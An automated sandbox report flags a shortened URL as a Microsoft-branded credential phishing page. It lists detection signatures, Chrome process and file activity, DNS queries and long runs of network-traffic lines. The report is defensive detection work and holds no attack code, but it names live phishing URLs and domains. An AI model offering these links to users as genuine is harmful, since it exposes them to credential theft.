Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://ampa.fi/uEvMZCXCvX

Overview

General Information

Sample URL:	https://ampa.fi/uEvMZCXCvX
Analysis ID:	1554557

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Phishing site detected (based on image similarity)

HTML body contains low number of good links

HTML body contains password input but no form action

HTML title does not match URL

Invalid 'forgot password' link found

Invalid T&C link found

Stores files to the Windows start menu directory

Classification

×

Process Tree

System is w10x64_ra

chrome.exe (PID: 3432 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6800 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1976,i,8209166340025267991,5161922559637104389,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 4592 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ampa.fi/uEvMZCXCvX" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI

LLM: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL '373939.multitudeofdreams.com' does not match the legitimate domain for Microsoft., The domain 'multitudeofdreams.com' is not associated with Microsoft and appears suspicious., The use of a subdomain '373939' and an unrelated main domain suggests a potential phishing attempt., The input fields mimic those commonly found on legitimate Microsoft login pages, which is a common phishing tactic. DOM: 1.1.pages.csv

Phishing site detected (based on image similarity)

Source: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI

Matcher: Found strong image similarity, brand: MICROSOFT

Source: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI

HTTP Parser: Number of links: 0

Source: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI

HTTP Parser: Title: Authenticating ... does not match URL

Source: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI

HTTP Parser: Invalid link: Forgot password?

Source: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI	HTTP Parser: Invalid link: Terms of use
Source: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI	HTTP Parser: Invalid link: Privacy & cookies
Source: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI	HTTP Parser: Invalid link: Terms of use
Source: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI	HTTP Parser: Invalid link: Privacy & cookies
Source: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI	HTTP Parser: Invalid link: Terms of use
Source: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI	HTTP Parser: Invalid link: Privacy & cookies

Source: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI

HTTP Parser: <input type="password" .../> found

Source: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI	HTTP Parser: No favicon
Source: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI	HTTP Parser: No favicon
Source: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI	HTTP Parser: No favicon

Source: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI	HTTP Parser: No <meta name="author".. found
Source: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI	HTTP Parser: No <meta name="author".. found
Source: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI	HTTP Parser: No <meta name="author".. found

Source: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI	HTTP Parser: No <meta name="copyright".. found
Source: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI	HTTP Parser: No <meta name="copyright".. found
Source: https://373939.multitudeofdreams.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWNYUmpaazQ9JnVpZD1VU0VSMDQxMTIwMjRVMTUxMTA0MTI	HTTP Parser: No <meta name="copyright".. found

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49740 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27

Source: global traffic	DNS traffic detected: DNS query: ampa.fi
Source: global traffic	DNS traffic detected: DNS query: 373939.multitudeofdreams.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: cdn.socket.io
Source: global traffic	DNS traffic detected: DNS query: www.w3schools.com
Source: global traffic	DNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global traffic	DNS traffic detected: DNS query: grastoonm3vides.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49740 version: TLS 1.2

Source: classification engine

Classification label: mal52.phis.win@18/20@28/218

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google\Chrome\Application\Dictionaries

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1976,i,8209166340025267991,5161922559637104389,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ampa.fi/uEvMZCXCvX"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1976,i,8209166340025267991,5161922559637104389,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
